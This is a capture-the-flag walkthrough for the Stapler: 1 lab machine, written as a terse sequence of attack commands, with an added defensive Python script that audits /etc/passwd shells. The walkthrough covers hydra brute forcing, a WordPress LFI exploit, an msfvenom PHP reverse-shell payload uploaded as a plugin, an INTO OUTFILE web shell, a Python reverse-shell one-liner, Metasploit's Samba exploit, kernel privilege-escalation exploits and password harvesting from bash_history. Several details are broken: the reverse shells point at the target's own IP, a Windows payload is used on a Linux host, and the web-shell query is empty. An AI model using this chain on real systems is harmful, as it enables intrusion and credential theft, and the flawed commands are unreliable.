The Stapler series has only one lab environment: Stapler: 1
Kali: 10.100.100.100
Target: 10.100.100.101
Find the target's address: nmap -A 10.100.100.0/24
Enumerate the target's ports with a full-port scan: nmap -A -sV 10.100.100.101 -p-
ftp://10.100.100.101
Anonymous login works with no password
The note file yields the usernames Elly, John, elly, harry; put all of them into ftp_name
hydra -L ftp_name -e nsr ftp://10.100.100.101 (n, s and r try the empty password, the username as password, and the reversed username)
Brute forcing shows elly's password is ylle; log in over FTP directly and the file found is /etc/passwd
Filter out the users that can log in remotely: cat passwd | grep -v -E "nologin|false" | cut -d ":" -f 1 > ssh_user_name
hydra -L ssh_user_name -e nsr ssh://10.100.100.101
Brute forcing yields the credentials SHayslett/SHayslett
ssh SHayslett@10.100.100.101 gives an initial foothold, but with low privileges
Enumerate shares: enum4linux -a 10.100.100.101 | tee smb_result; there are shares that allow access without a password
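The passwd filter above is the attacker's view of which accounts are worth password guessing, and it is a coarse one: grep -v "nologin|false" drops any line that merely contains those words and keeps accounts whose shell is something like /bin/sync. As an added example that is not part of the original walkthrough, this Python script parses a constructed /etc/passwd on the shell field itself, which is how an administrator auditing for brute-forceable accounts would do it; the list of non-interactive shells is an assumption for the example.

```python
# Added example (not from the original walkthrough): audit /etc/passwd for
# accounts with an interactive login shell, checking the shell field rather
# than grepping the whole line. The sample file below is constructed.

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
falsehope:x:1001:1001:Not a nologin account:/home/falsehope:/bin/bash
elly:x:1002:1002::/home/elly:/bin/zsh
kathy:x:1003:1003::/home/kathy:/bin/false
"""

# Shells that do not give an interactive session (assumed list for this example).
NON_INTERACTIVE_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def interactive_accounts(passwd_text):
    """Return usernames whose login shell is interactive, in file order.

    An empty shell field means the system default (/bin/sh), so it counts as
    interactive. Malformed entries (not 7 fields) are skipped, not guessed at.
    """
    users = []
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, shell = fields[0], fields[6]
        if shell not in NON_INTERACTIVE_SHELLS:
            users.append(name)
    return users


def grep_style_accounts(passwd_text):
    """Mimic the walkthrough's grep -v -E "nologin|false" | cut -d: -f1 filter."""
    return [l.split(":")[0] for l in passwd_text.splitlines()
            if l and "nologin" not in l and "false" not in l]


if __name__ == "__main__":
    print("shell-field check:", interactive_accounts(SAMPLE_PASSWD))
    print("grep-style check: ", grep_style_accounts(SAMPLE_PASSWD))
```

On the constructed file the grep filter keeps sync (no real shell) and misses falsehope, whose bash login is exactly what an audit should catch.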
smbclient -N //10.100.100.101/kathy
smbclient -N //10.100.100.101/tmp
http://10.100.100.101:12380, the page source hints at a user Zoe
nikto -host http://10.100.100.101:12380, which reveals many paths
http://10.100.100.101:12380/blogblog, a WordPress blog
http://10.100.100.101:12380/phpmyadmin/, a phpMyAdmin database management tool
https://10.100.100.101:12380/blogblog/wp-login.php?action=register, the registration page
https://10.100.100.101:12380/blogblog/wp-content/uploads/, a directory listing page
wpscan --url https://10.100.100.101:12380/blogblog/ -e ap --disable-tls-checks --plugins-detection aggressive
The WordPress plugin advanced-video-embed-embed-videos-or-playlists is vulnerable to local file inclusion
searchsploit advanced video
www.exploit-db.com/exploits/39…
import ssl (add this where the modules are imported)
ssl._create_default_https_context = ssl._create_unverified_context
url = "https://10.100.100.101:12380/blogblog" # insert url to wordpress
Run python 39646.py directly; it produces a new file 1140321183.jpeg (this still uses Python 2)
wget https://10.100.100.101:12380/blogblog/wp-content/uploads/1140321183.jpeg --no-check-certificate
cat 1140321183.jpeg, which contains the database credentials root/plbkac
mysql -h 10.100.100.101 -uroot -pplbkac
select concat(user_login,':',user_pass) from wp_users; put the usernames and hashes into wp_user
john --wordlist=/usr/share/wordlists/rockyou.txt recovers some of the passwords; the hashes are MD5-based
hash-identifier can identify the hash type
https://10.100.100.101:12380/blogblog/wp-login.php logs in with john/incorrect
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.100.100.101 LPORT=4444 -f raw > shell.php
use windows/shell_reverse_tcp
Plugins -> Add New -> Upload Plugin: upload shell.php
https://10.100.100.101:12380/blogblog/wp-content/uploads/ open shell.php to get the reverse shell
Without msf, a web shell can also be written directly from the database: select '' into outfile '/var/www/https/blogblog/wp-content/uploads/shell.php';
https://10.100.100.101:12380/blogblog/wp-content/uploads/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.100.100.101",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Listen on Kali: nc -vlp 4444
Alternatively, get root directly through port 139
msfconsole
search Samba
use exploit/linux/samba/is_known_pipename
set rhosts 10.100.100.101
set rport 139
run
Alternatively
If not going through port 139, escalate privileges locally
uname -a shows that this kernel version has a known vulnerability
cd ebpf_mapfd_doubleput_exploit
chmod +x compile.sh
./compile.sh
./doubleput
Root obtained
Alternatively
gcc cve-2021-4034-poc.c -o test
chmod +x test
./test
Root obtained
Alternatively
cat /home/*/.bash_history | grep -v exit
JKanode/thisimypassword;peter/JZQuyIN5
peter has sudo rights
sudo -l
sudo su - root